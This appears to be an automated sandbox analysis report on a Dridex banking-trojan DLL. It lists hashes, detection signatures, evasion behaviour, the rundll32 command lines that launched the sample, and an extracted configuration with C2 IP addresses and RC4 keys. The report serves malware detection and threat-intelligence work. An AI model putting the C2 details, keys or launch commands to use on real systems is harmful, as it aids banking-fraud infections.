Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll
Analysis ID:	544184
MD5:	d633b0989e97dc05b09b6233fb53cf37
SHA1:	6e5a7f0493fea40bd213209ad06f4dd9069969ed
SHA256:	03ba158e40b1f9c80c0430cd9a06f00bcbddd3826a5965fccb4ac5b242b91a2c
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6168 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 1228 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4232 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000000.351015506.000000006F501000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.395029698.000000006F501000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000000.352673706.000000006F501000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
4.0.rundll32.exe.6f500000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
1.2.loaddll32.exe.6f500000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.6f500000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6f500000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1228, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1, ProcessId: 4232

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.loaddll32.exe.6f500000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

ReversingLabs: Detection: 30%

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.357261352.000000000526F000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb5 source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.355098494.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb3 source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb9 source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb+ source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbA source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb' source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.355098494.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb- source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28
Source: Joe Sandbox View	IP Address: 80.211.3.13 80.211.3.13

Source: WerFault.exe, 00000007.00000002.392906912.0000000005267000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.390686455.0000000005267000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.390854783.0000000005267000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.c
Source: WerFault.exe, 00000007.00000002.392821249.00000000051D8000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.390936309.00000000051D8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.352722173.000000006F51F000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 4.0.rundll32.exe.6f500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6f500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6f500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6f500000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.351015506.000000006F501000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.395029698.000000006F501000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.352673706.000000006F501000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F510730	1_2_6F510730
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F519370	1_2_6F519370
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F51143C	1_2_6F51143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F508428	1_2_6F508428
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F50A4E8	1_2_6F50A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F501494	1_2_6F501494

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F512234 NtDelayExecution,		1_2_6F512234
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F512820 NtAllocateVirtualMemory,		1_2_6F512820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

ReversingLabs: Detection: 30%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4232

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER55D7.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.357261352.000000000526F000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb5 source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.355098494.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb3 source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb9 source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb+ source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdbA source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb' source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.23460.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.355098494.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb- source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.362705058.0000000005660000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.362713341.0000000005666000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.362697511.0000000005531000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F50F6A8 push esi; mov dword ptr [esp], 00000000h

1_2_6F50F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1136

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1136

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F510730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

1_2_6F510730

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: WerFault.exe, 00000007.00000002.392769142.00000000051A0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWH#
Source: Amcache.hve.7.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
